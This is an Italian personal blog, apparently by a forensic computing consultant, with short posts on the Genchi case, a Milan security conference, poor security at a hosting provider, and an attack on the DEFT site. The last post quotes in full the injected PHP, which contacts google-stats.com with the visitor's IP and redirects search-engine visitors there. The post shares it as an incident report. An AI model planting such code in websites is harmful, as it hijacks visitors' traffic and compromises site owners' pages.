Sarà perchè….
0… non sa parlare in inglese o perchè non sa raccontare PALLE in una lingua diversa dall’ italiano?
Bah…..!
Il caso Genchi
0
credit: nonnonino85
In questi ultimi anni stiamo vivendo una serie di presunti scandali (quasi tutti della stessa natura) che ci stanno letteralmente saturando il cervello. Sembra di essere tornati ai tempi di TANGENTOPOLI solo che è tutto al contrario, il mondo sta girando nel senso opposto e alcuni di noi sono fermi sospesi nell’aria a guardare la terra che, sotto i propri piedi, non gira più in senso orario.
Vi segnalo un blog di una persona che adesso può solo difendersi senza attaccare, anche se in alcuni casi la miglior difesa è l’attacco; ma qui, se qualcuno prova ad attaccare, rischia seriamente di rovinarsi la vita per poi dopo qualche anno ripensarci ed affermare: “ma chi me l’ha fatto fare?”
Gioacchino Genchi è un collega, e dobbiamo stargli vicino perchè quello che è successo a lui oggi potrebbe succedere a me o a noi CTU domani; non so se è colpevole, non so se è innocente, ma esprimo solidarietà per l’accaduto sperando che venga fatta chiarezza una volta per tutte.
Attacco al cuore del palazzo
0
credit: anna de luca
Sabato 31 gennaio sarò in quelli di Milano per il convegno “Attacco al cuore del palazzo” che si terrà presso il Salone Valente in via Freguglia 14 (di fronte al Palazzo di Giustizia), dove il Presidente (rigorosamente con la P maiuscola) di IISFA insieme ad altri colleghi illustreranno una simulazione di attacco informatico presso, se non ricordo male (e qualcuno mi corregga se sbaglio), gli uffici del Palazzo di Giustizia; a seguire un interessante intervento sempre di Gerardo Costabile dal titolo “Sicurezza informatica aziendale ed istituzionale: metodologie di indagini interne e raccordo con gli organi inquirenti e di intelligence”.
Ci vediamo li!
Il calore dei baresi…
1Lo so, è vecchiotta, ma è una delle pubblicità più geniali che io abbia mai visto :-)
Hosting – Servage sempre più scadente
3
credit: Jason Gulledge
Da più di due anni sono cliente del servizio di hosting offerto da Servage, azienda del gruppo Tukovs che a fronte di un prezzo abbastanza onesto, offre sulla carta un servizio di hosting niente mala. Mai avuto problemi! Sono sempre stato soddisfatto del servizio offerto tantè che l’ho consigliato ad alcuni miei colleghi.
Da 6 mesi però la favola sembra essere finita. Affermo questo perchè sembra che l’ufficio sicurezza sia andato in ferie perenne! I loro server sono diventati dei colabrodi. Posso scolarci la pasta la sera! Sostanzialmente mi trovo molto spesso delle injection di tag in molte pagine, sia che esse siano di cms sia in siti web statici in html. Ovviamente ho controllato tutte le falle che potrebbero riguardarmi ed ho eseguito il Pascucci WP test senza alcun riscontro rilevante…!
Il loro servizio di ticketing è superficiale e irritante. Rispondono con palesi copia e incolla. L’operatore non è persona competente in materia tantè che molto spesso vengo “girato” a più operatori che provano a rispondere alle mie affermazioni con frasi tipo “leggi il readme dello script che usi”… quando non uso alcuno script o_O”.
Terrificante! Sto rimpiangendo il buon e vecchio aruba.it
Loacker che bontà…
1
Questa mattina sono stato informato da Enrico Ardizzoni che il sito di DEFT (e anche questo blog, l’ho appena scoperto) è stato oggetto di un attacco tipo quello descritto nel blog di Mario Pascucci.
Effettivamente in questi ultimi giorni avevo notato un netto calo degli accessi ma avevo attribuito la colpa alle feste che ormai stanno giungendo al termine. E invece no! Di seguito la simpatica injection:
<?php function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents(“http://google-stats.com/ip.php?ip=$ip”);if($uniq===false){return false;}if($uniq==”go”){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,”google”)!==false)and(strpos($ref,”bot.htm”)===false)){if(get_counter()){@header(“Location: http://google-stats.com/tds_u.php?dname=”.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,”yahoo”)!==false)and(strpos($ref,”slurp”)===false)){if(get_counter()){@header(“Location: http://google-stats.com/tds_u.php?dname=”.$_SERVER['HTTP_HOST']);die();}} ?>
Ho capito che è proprio in questi giorni che bisogna tenere la guardia ancora più alta evitando di “abbandonare” del tutto il mondo della rete proprio come ho fatto io.
Mannaggia mannaggia…. sti wafer non sanno proprio che fare :-)